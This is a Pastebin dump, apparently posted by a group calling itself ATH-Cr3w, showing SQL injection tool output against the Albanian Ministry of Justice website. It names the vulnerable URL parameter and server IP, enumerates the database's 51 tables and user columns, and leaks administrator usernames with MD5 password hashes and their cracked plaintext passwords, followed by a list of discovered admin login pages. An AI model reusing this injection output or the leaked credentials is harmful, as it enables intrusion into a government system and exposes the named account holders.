SHARE
TWEET

Albanian Ministry of Justice Exploited by ATH-Cr3w

a guest Apr 24th, 2011 1,173 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Albanian Ministry of Justice Exploited by ATH-Cr3w
  2.  
  3. 1: Justice.Gov.Al  Exploited by ATH-Cr3w
  4. 2: Justice.Gov.Al db Exploited
  5. 3: Analyzing http://www.justice.gov.al/index.php?gj=gj1
  6. Host IP: 46.4.210.234
  7. Web Server: Apache
  8. Keyword Found: Kreu
  9. I guess injection type is Integer?!
  10. DB Server: MySQL
  11. Current DB: justice2011DB
  12. MySQL error based injection method can be used!
  13. Count(table_name) of information_schema.tables Where table_schema=0x6A757374696365323031314442 is 51
  14. Can not get all tables by group_concat!
  15. Count(table_name) of information_schema.tables Where table_schema=0x6A757374696365323031314442 is 51
  16. Table found: aktivitete
  17. Table found: cms_albumet
  18. Table found: cms_artikujt
  19. Table found: cms_config
  20. Table found: cms_contacts
  21. Table found: cms_fotoalbume
  22. Table found: cms_galeri
  23. Table found: cms_kategorite
  24. Table found: cms_katpeople
  25. Table found: cms_lajme
  26. Table found: cms_langs
  27. Table found: cms_links
  28. Table found: cms_people
  29. Table found: cms_reklama
  30. Table found: cms_settings
  31. Table found: cms_skedaret
  32. Table found: cms_userkats
  33. Table found: cms_users
  34. Table found: logs
  35. Table found: phpbb_auth_access
  36. Table found: phpbb_banlist
  37. Table found: phpbb_categories
  38. Table found: phpbb_config
  39. Table found: phpbb_confirm
  40. Table found: phpbb_disallow
  41. Table found: phpbb_forum_prune
  42. Table found: phpbb_forums
  43. Table found: phpbb_groups
  44. Table found: phpbb_posts
  45. Table found: phpbb_posts_text
  46. Table found: phpbb_privmsgs
  47. Table found: phpbb_privmsgs_text
  48. Table found: phpbb_ranks
  49. Table found: phpbb_search_results
  50. Table found: phpbb_search_wordlist
  51. Table found: phpbb_search_wordmatch
  52. Table found: phpbb_sessions
  53. Table found: phpbb_sessions_keys
  54. Table found: phpbb_smilies
  55. Table found: phpbb_themes
  56. Table found: phpbb_themes_name
  57. Table found: phpbb_topics
  58. Table found: phpbb_topics_watch
  59. Table found: phpbb_user_group
  60. Table found: phpbb_users
  61. Table found: phpbb_vote_desc
  62. Table found: phpbb_vote_results
  63. Table found: phpbb_vote_voters
  64. Table found: phpbb_words
  65. Table found: video
  66. Table found: votime
  67. Count(column_name) of information_schema.columns Where table_schema=0x6A757374696365323031314442 AND table_name=0x70687062625F7573657273 is 47
  68. Column found: user_id
  69. Column found: user_active
  70. Column found: username
  71. Column found: user_password
  72. Column found: user_session_time
  73. Column found: user_session_page
  74. Column found: user_lastvisit
  75. Column found: user_regdate
  76. Column found: user_level
  77. Column found: user_posts
  78. Column found: user_timezone
  79. Column found: user_style
  80. Column found: user_lang
  81. Column found: user_dateformat
  82. Column found: user_new_privmsg
  83. Column found: user_unread_privmsg
  84. Column found: user_last_privmsg
  85. Column found: user_login_tries
  86. Column found: user_last_login_try
  87. Column found: user_emailtime
  88. Column found: user_viewemail
  89. Column found: user_attachsig
  90. Column found: user_allowhtml
  91. Column found: user_allowbbcode
  92. Column found: user_allowsmile
  93. Column found: user_allowavatar
  94. Column found: user_allow_pm
  95. Column found: user_allow_viewonline
  96. Column found: user_notify
  97. Column found: user_notify_pm
  98. Column found: user_popup_pm
  99. Column found: user_rank
  100. Column found: user_avatar
  101. Column found: user_avatar_type
  102. Column found: user_email
  103. Canceling...
  104. Job Canceled!
  105. Count(*) of justice2011DB.phpbb_users is 1
  106. Turning off 'bypass illegal union' and retrying!
  107. Data Found: user_email=
  108. Data Found: user_password=9345b4e983973212313e4c809b94f75d : md5decrypted:justice
  109. Data Found: username=Zamiri
  110. Cracking hash: 9345b4e983973212313e4c809b94f75d
  111. Plain text of 9345b4e983973212313e4c809b94f75d is justice
  112. Count(column_name) of information_schema.columns Where table_schema=0x6A757374696365323031314442 AND table_name=0x636D735F7573657273 is 10
  113. Column found: UserID
  114. Column found: UserName
  115. Column found: UserPassword
  116. Column found: Emer
  117. Column found: Email
  118. Column found: Pershkrim_gj1
  119. Column found: Pershkrim_gj2
  120. Column found: Pershkrim_gj3
  121. Column found: isAdmin
  122. Column found: UserStatus
  123. Count(*) of justice2011DB.cms_users is 3
  124. Data Found: UserStatus=0
  125. Data Found: isAdmin=1
  126. Data Found: UserID=12
  127. Data Found: UserName=ministria
  128. Data Found: UserPassword=aaaa70438a762d6e5a2493a2d80c984c : md5decrypted:drejtesi
  129. Turning on 'bypass illegal union' and retrying!
  130. Data Found: Email=
  131. Data Found: UserStatus=0
  132. Data Found: isAdmin=1
  133. Data Found: UserID=20
  134. Data Found: UserName=marilda
  135. Turning off 'bypass illegal union' and retrying!
  136. Canceling...
  137. Job Canceled!
  138. Finding admin page: http://www.justice.gov.al/
  139. Page Found: http://www.justice.gov.al/admin/
  140. Page Found: http://www.justice.gov.al/admin/home.php
  141. Page Found: http://www.justice.gov.al/admin/cp.php
  142. Page Found: http://www.justice.gov.al/admin/admin_login.php
  143. Page Found: http://www.justice.gov.al/admin/controlpanel.php
  144. Page Found: http://www.justice.gov.al/admin/admin-login.php
  145. Page Found: http://www.justice.gov.al/admin/account.php
  146. Page Found: http://www.justice.gov.al/admin/admin.php
  147. Page Found: http://www.justice.gov.al/admin/login.php
  148. Page Found: http://www.justice.gov.al/admin/adminLogin.php
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top